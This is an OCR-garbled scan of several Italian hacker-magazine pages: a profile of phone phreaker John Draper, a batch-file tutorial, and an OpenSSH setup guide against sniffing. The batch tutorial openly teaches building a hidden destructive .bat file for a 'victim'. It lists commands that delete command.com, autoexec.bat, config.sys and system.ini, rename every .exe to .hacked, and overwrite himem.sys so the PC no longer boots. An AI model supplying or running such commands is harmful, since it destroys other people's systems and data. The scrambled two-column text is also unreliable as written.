ohn Draper, alias Captain sempre rimasti al sicuro, più defilati. Blue Box, un marchingegno capace
Crunch, è stato il primo hac- Ed infatti Draper nel bene o nel male di imitare i segnali tipici
ker che la storia ricordi. Ma- ha continuato la sua vita da “zingaro“ delle linee di commutazione.
gari non il primo assoluto. dell’informatica mentre i suoi coeta- Così finì per interessarsi
Sicuramente il più geniale. nei si accomodavano in dietro a co- anche l'FBI e Captain Crunch
La storia è abbastanza no- mode scrivanie di palissandro con venne arrestato negli anni
ta, Draper, in pieni anni ’70, aveva poltrona in pelle incorporata. Ha par- Settanta.
scoperto che un fischietto trovato al- tecipato, insieme all’amico Jobs alla
l’interno di una scatola di cereali, o nascita di Apple, ha sviluppato i primi PHONE PHREAKING
patatine a seconda delle versioni, videogiochi e per lungo tempo ha sta- Col passare degli anni
emetteva un suono con una frequen- zionato in India cavalcando l’onda e con l'avvento dei chip DSP
za pari a 2600 Hertz in grado di della controcultura degli anni ’70. il phone phreaking passa sui
sbloccare la linea del sistema telefo- Sembra che come animale dome- computer e le blue box diventano
nico americano e di ottenere il se- stico abbia un alligatore, che tiene programmi software che generano
gnale libero per chiamare in ogni an- nella vasca da bagno. Una scelta e inviano i toni desiderati.
golo del pianeta.I cerali o patatine perfettamente in linea con il suo stile Ancora oggi si segnalano 150mila
che dir si voglia, avevano un nome di vita. Le notizie più recenti del “no- attacchi ai telefoni pubblici,
piuttosto divertente Captain Crunch, stro capitano” tuttavia lo danno co- solo a New York mentre phone
che è diventato a pieno titolo il so- me prossimo al salto della barricata. phreaker di tutto il mondo
prannome di Draper. Draper dopo Sembra infatti che aiuterà i siti di si ritrovano periodicamente
aver utilizzato la tecnica del fischiet- grosse società a difendersi dagli at- sulle linee per chiacchierare.
to, ha messo a punto un sistema più tacchi dei pirati della rete. Ma il mito
complesso e efficace per chiamare a rimane. K FONTI
sbafo ovunque: Bluebox. Un dispositi- In Cyberpunk, antologia di testi
vo che consentiva di accedere ai nu- Blue Box: permetteva di attivare i politici, ed.Shake, 1990;
meri verdi per incanalare le chiama-
te in qualsiasi direzione. Secondo le
leggende John Draper utilizzando
? codici di controllo delle linee
telefoniche analogiche e effettuare
telefonate gratuitamente.
Paul Mungo e Bryan Glough,
Approaching Zero, Random House,
1992. K

www.hackerjournal.it |27
PRATICA

DOS UN’”ARMA” INSOSPETTABILE

vs.
Dos è l’archetipo del sistema operativo, è alla base di Windows, ma può essere
usato anche per “terminarlo”…

M
olti pensano che e il buon che potrà eseguire tutti i comandi a MD <nomecartella> crea una cartella
vecchio Dos sia ormai inu- vostro piacimento.
tile... Ma chi smanetta con Copiatevi il vostro file AUTOEXEC.BAT RD <nomecartella> cancella la cartella
i PC sin da quando ha 5 da qualche parte sull'hard-disk (non
anni (il mio caso :D) e modificate né eliminate quello di DEL <file> cancella il file
quindi ha usato Dos, sa sistema perché questo file è di fonda-
benissimo tutti i suoi limiti e tutti i suoi mentale importanza per Windows). COPY <file> copia un file in una
vantaggi... Schiacciando col tasto destro, e directory o in un altro file
Quante volte avete pensato: "ora a andando su “modifica” verrà aperto il
quello gli “frittello il PC...!". Ma poi notepad che conterrà qualche stringa DIR visualizza file
quando era ora di agire non sapevate di comando.
come fare. Bene, Il Dos è di grande Quelle sono alcune operazioni che DIR/p visualizza file in più pagine
aiuto in questi casi. il PC esegue alla sua accensione.
Se non sapete programmare, non Cancellate tutto il contenuto e ora RENAME rinomina un file
usate virus per paura di infettarvi, Dos avete un file bat pulito da editare
può fare al caso vostro. come volete. FORMAT <disc> Formatta il disco
Ma cominciamo col dire cos'è Dos Il Dos non è molto sicuro. Come
(qualcuno non lo sa???). E’ il primo saprete se si prova a cancellare un file Ma entriamo nei particolari... Ora
sistema operativo di casa Microsoft, di importanza vitale per Windows, da vi spiegherò come fare determinate
non ha nulla di visuale, ma conoscen- Windows, questo ci avverte e non ce cosuccie: D.
do alcuni comandi si può fare di tutto. lo fa eliminare. Ma questo discorso Per cominciare, ogni file deve iniziare con:
Dos è il padre di Windows, e anche se non vale col Dos!! Se ad esempio nel
ad alcuni può sembrare strano file bat scriviamo: --> @echo off
Windows usa ancora molto Dos...
-->delc:\windows\command.com A che serve?
Con @echo off l'utente non vedrà il
>> Si comincia salviamo il file e lo apriamo. Il file bat comando appena eseguito.
cancellerà il file command.com della
Quasi tutti voi macchina e al prossimo riavvio il PC Cioè?
avrete sentito par- non partirà! Se io faccio un file che entra nella car-
lare del celebre file E questo è un piccolo esempio, un tella c:\prova\ scriverò:
AUTOEXEC.BAT, file bat può formattare l'hard disk, can-
presente in tutti i cellare dati, copiare dati. --> @echo off
sistemi di casa --> cd prova
Microsoft. Quello
è un esempio di >> I comandi principali e apparirà:
file bat. Un file bat
non è altro che un file che esegue una Questi sono comandi base di Dos, --> c:\
serie di comandi Dos in successione. anche se ne esisotno molti altri. --> c:\prova\
Con un qualsiasi editor (usate note-
pad!) si può modificare un file bat, CD <nomecartella> entra nella cartella Se invece non dovessi mettere

28 | www.hackerjournal.it
>>
@echo off apparirebbe sulla nostra il sistema della vittima e non voglio che --> type XMSXXXX0 > c:\win-
schermata: sia visibile e modificabile scriverò: dows\himem.sys
--> ATTRIB nomefile.bat +H +R Il file dovrebbe venir riempito di carat-
--> c:\ teri inutili fino ad occupare quantità
--> c:\cd prova Il comando COPY enormi.
IL COMANDO DA ME ESEGUITO! Questo comando è molto flessibile e Un esempio molto dannoso:
--> c:\prova\ permette le seguenti operazioni:
--> @echo off
Quindi se volete cancellare un file a --> copy file.estensione c:\nome- --> del c:\autoexec.bat
qualcuno e questo ci capisce un po' di cartella\<--> copierà il file nella --> del c:\config.sys
Dos dovrete per forza usare il coman- cartella --> rename c:\*.exe *.hacked
do @echo off perché se no lui si vedrà --> del c:\windows\win.*
apparire ---> del c:\nomefile.estensio- --> copy file2.estensione+file1. --> del c:\windows\system.ini
ne e se ne accorgerà subito! estensione<--> sostituirà al file2 il --> rename c:\windows\*.exe
Analogamente il comando echo file1 c:\windows\*.hacked
può servire a far visualizzare delle scrit- --> del c:\command.com
te. Per esempio se scrivo: --> copy file1.estensione+file2. --> del
c:\windows\command.com
--> type XMSXXXX0 > c:\win-
dows\himem.sys

DOS: Disk Operating System

? Software che consente l'uso


del computer. E' composto da:
il BIOS, il kernel e la shell.

Il PC dove verrà eseguito questo pro-


gramma non parirtirà più! E il vostro obbiet-
tivo sarà completato :D.
--> echo CIAO A TUTTI estensione c:\nomecartella\ La guida è finita. Spero che sia stata di
nel file apparirà la scritta CIAO A TUTTI copierà i file nella cartella vostro gradimento e che vi sia servita a
Per scrivere una riga vuota basterà Il comando FIND qualcosa :D.
invece scrivere --> echo. Trova un determinato carattere o paro-
Per cancellare quello scritto fino ad ora la in un file.
si userà --> cls.
>> Una piccola
FIND "CIAO" file.estensione cerca “preghiera”
nel file.estensione la frase CIAO
>> Non finisci mica qui!
Il comando TYPE Data la pericolosità della procedura vi
Ecco altri comandi che è importante Visualizza il contenuto di un file. prego di non “frittellare” il PC a nessu-
conoscere. no, ma di considerare questo articolo
Questo comando può essere usato una interessante esercitazione. K
Gli attributi per sfruttare un baco di Windows...
Molti di voi si saranno chiesti come si scrivendo: ^Cub3^
modificano gli attributi di un file via dos.
Il comando è ATTRIB e le opzioni sono:

+/- R abilita/disabilita sola lettura

+/- A abilita/disabilita l'opzione


archivio

+/- S abilita/disabilita l'opzione


sistema

+/- H abilita/disabilita l'opzione


nascosto

Per esempio, creo un file dannoso per

www.hackerjournal.it | 29
Sicurezza

COME COMBATTERE LO “SNIFFING” DEI DATI

Connessioni ? SNIFFER: Uno sniffer e'


un qualsiasi strumento, sia esso
un software o un apparato
hardware, che raccoglie
le informazioni che viaggiano
lungo una rete (network).

criptate con SSH Generalmente si utilizzano


software sniffer e il termine
in questione si riferisce a: 'The
Sniffer Network Analyzer',
il nome del primo programma
Il misterioso LoRdVicio ci guida attraverso di questo tipo, sviluppato
dalla Network Associates, Inc.
i meandri di Secure Shell, un efficace modo e protetto da trademark.

di proteggerci dallo sniffing dei dati…

U
no dei maggiori pericoli della rete >> Ssh1 e Ssh2 \----> AuTeNtiFiCazIOnE <----/
è lo sniffing, una delle tecniche più
usate dai cracker per ottenere user- La Ssh1 è la più vecchia, la Ssh2 è una Quando un utente tenta di collegarsi ad
name e password validi per acce- completa riscrittura della vecchia versione ed un sistema remoto, l' autentificazione può
dere ai sistemi che vogliono violare. Con la è più sicura. Noi comunque ci occuperemo avvenire in diversi modi:
tecnica dello sniffing gli eventuali malinten- della priva versione...
zionati si pongono in ascolto sulla nostra re- * RhostsAuthentication
te ed intercettano tutti i pacchetti in transito, \----> InIzIam0 <----/ Prevede che se il sistema da cui l'utente ten-
alla ricerca di username e password tra- ta il collegamento è elencato in uno dei file
smessi in chiaro. Se la vostra rete nn è sicura Ogni host su cui è installato ssh possiede /etc/hosts.equiv, /etc/ssh/shosts.equiv, $HO-
o volete collegarvi ad un server Unix che è su una coppia di chiavi RSA (un algoritmo di ME/.rhosts, $HOME/.shosts, l'accesso è con-
una rete diversa dalla vostra, per evitare il crittografia a chiave asimmetrica) lunghe sentito senza password. Poiché questo meto-
pericolo dello sniffing, conviene effettuare 1024 bit, una pubblica ed una privata. In do comporta una scarsa protezione verso i
connessioni criptate... Secure Shell (ovvero più, ogni utente che utilizza ssh può opzio- tentativi di spoofing, esso è disabilitato per
Ssh) è il modo migliore per criptare le vostre nalmente generare una propria coppia di default.
connessioni verso altri sistemi e poter naviga- chiavi RSA. All'atto della connessione, il ser-
re tranquilli. Con ssh è possibile effettuare il ver comunica al client due chiavi pubbliche: * RhostsRSAAuthentication
tunnelling di connessioni x11 o di altre appli- Questo metodo è la combinazione tra la
cazioni che lavorano su particolari porte, in * una fissa di 1024 bit che è la vera e pro- precedente ed una autentificazione basata
modo che esse lavorino in modo sicuro! pria chiave dell'host //// su sistema RSA. In pratica l'accesso è con-
* l'altra di 768 bit che viene rigenerata ogni sentito dai file /etc/hosts.equiv ,
Questo protocollo risolve inoltre alcuni ora //// /etc/ssh/shosts.equiv , $HOME/.rhosts ,
"grossi" problemi di sicurezza dei protocolli $HOME/.shosts e inoltre è presente
TCP/IP come lo spoofing : Il client allora genera una sequenza casuale nel file /etc/ssh_known_hosts oppure $HO-
di 256 bit (challange) e la codifica con le ME/.ssh/known_hosts la chiave ke
IP spoofing ----> falsificazione dell'indirizzo chiavi pubbliche del server. Da questo mo- identifica il client che sta tentando la connes-
IP del mittente mento in poi la connessione viene crittogra- sione,allora l'accesso è consentito.
DNS spoofing ----> falsificazione delle infor- fata con uno degli algoritmi a chiave sim-
mazioni nel DNS metrica supportati da ssh (IDEA, DES, * RSAAuthentication
Routing spoofing ----> falsificazione delle 3DES,ecc..) e si passa alla fase di autentica- Questo metodo si basa sul sistema di chiavi
strade intraprese dai pacchetti zione. pubbliche e private Rsa. Ad ogni

30 | www.hackerjournal.it
>>
la sua installazione e configurazione sulla [root@root]$ ssh host.dominio.it
nostra linux-box. In questo articolo utilizze-
remo OpenSSH (www.openssh.com), In questo modo si tenta la connessione
una versione free di ssh,compatibile con i con l'utente di default del client.
2 protocolli ssh1 e ssh2. Per collegarci con il nostro utente:
Per poter usare openshh nel vostro si-
stema serve che sia già installato OpenSSL [root@root]$ ssh utente@host.dominio.it
(www.openssl.com) e le librerie Zlib oppure
(www.gzip.org/zlib/). [root@root]$ ssh host.dominio.it -l utente

Se effettuate la connessione tramite mo-


dem, avete la possibilità di renderla più ve-
loce con la compressione dei dati, con il se-
guente comando:

[root@root]$ ssh -C utente@host.dominio.it

Con ssh è possibile effettuare il trasferi-


mento dei file in maniera sicura sulla rete. Il
comando per far questo è `scp` che funzio-
na in maniera simile al cp di linux. Ad esem-
pio x trasferire un file ad un sistema remoto
si usa il seguente messaggio:

DNS: Domain Name Server Tutti questi software sono disponibili sia in [root@root]$ scp /home/vicio/ssh.txt

? Server Internet che gestisce le


richieste di URL da parte degli utenti.
Ciascun ISP ha un DNS.
formato RPM e sia in tar.gz. Possiamo in-
stallare i pacchetti con i command:

[root@root]$ rpm -ivh pakketto.rpm


utente@host.dominio.it:/nfzcrew/tutorial

e per eseguire la procedura inversa

[root@root]$ scputente@host.dominio.it:
utente sono associate due chiavi utilizzate [root@root]$ tar xfvz pakketto.tar.gz /nfzcrew/tutorial/ssh.txt/home/vicio
per l'autentificazione,una pubblica (imma- [root@root]$ cd pakketto
gazzinata nel file $HOME/.ssh/identity.pub [root@root]$ ./configure Per personalizzare il funzionamento di
) ed una privata ( immagazzinata nel file [root@root]$ make && make install ssh è possibile modificare alcuni file di
$HOME/.ssh/identity ).In fase di autentifica- configurazione. In particolare, per modi-
zione il client fornisce la chiave pubblica Una volta installato openssl e le librerie ficare le opzioni del client ssh il file da
con la quale tenta il collegamento. zlib possiamo procedere alla installazione di modificare è /etc/ssh/ssh_config.
Il server controlla all’interno del file openssh. Se utilizziamo il pacchetto rpm il la- Modificando questo file si potrà cam-
$HOME/.ssh/authorized_keys che sia pre- voro sarà semplificato, noi useremo il tar.gz biare le modalità di funzionamento del
sente la chiave inviata dal client, in tal ca- client per tutti gli utenti. Se si vuole per-
so, invia al client un challenge (un nume- [root@root]$ tar xfvz openssh-2.9.tar.gz sonalizzare il client per ogni alcuni utenti
ro casuale,criptato usando la chiave pub- [root@root]$ cd openssh-2.9p2 basterà copiare il file nella home di cia-
blica del client ). Il client decripta il chal- [root@root]$ ./configure --sysconf scuno di essi, e più precisamente in
lenge con la chiave privata dell'utente,e ne dir=/etc/ssh $HOME/.ssh/ssh_config procedendo poi
da comunicazione al server, dimostrando [root@root]$ make la sua modifica.
così di avere la chiave privata,così l'utente [root@root]$ make install Se si vuole modificare il funzionamen-
può accedere senza password . [root@root]$ make host-key to del demone sshd il file da modificare è
/etc/ssh/sshd_config.X esempio se si vuo-
* Password Con il comando `--sysconfdir` dicia- le togliere l'accesso all'utente root tramite
Se nessuno di questi metodi esposti ha suc- mo ad ssh di utilizzare come directory x i ssh, basta aggiungere a tale file la stringa
cesso , l'autentificazione viene effettuata con file d'installazione /etc/ssh anziché quella
la richiesta all'utente di una password,che di default /usr/local/etc. PermitRootLogin no
viene comunque criptata . Con il comando `host-key` creiamo le
host keyRSA e DSA. A questo punto per Openssh è uno strumento molto fles-
provare il tutto basterà lanciare il demone sibile, per imparare ad usarlo al meglio
>> Installazione e con- sshd con il comando: leggetevi la sua documentazione.
figurazione di Ssh Se volete un sistema "sicuro" avrete
[root@root]$ sshd start fatto il primo passo… K

Dopo aver trattato gli aspetti teorici su cui Per collegarsi ad un sistema remoto con Lordvicio
si basa ssh,vediamo come procedere per Ssh utilizziamo il comando: lordvicio@hotmail.com

www.hackerjournal.it | 31

Potrebbero piacerti anche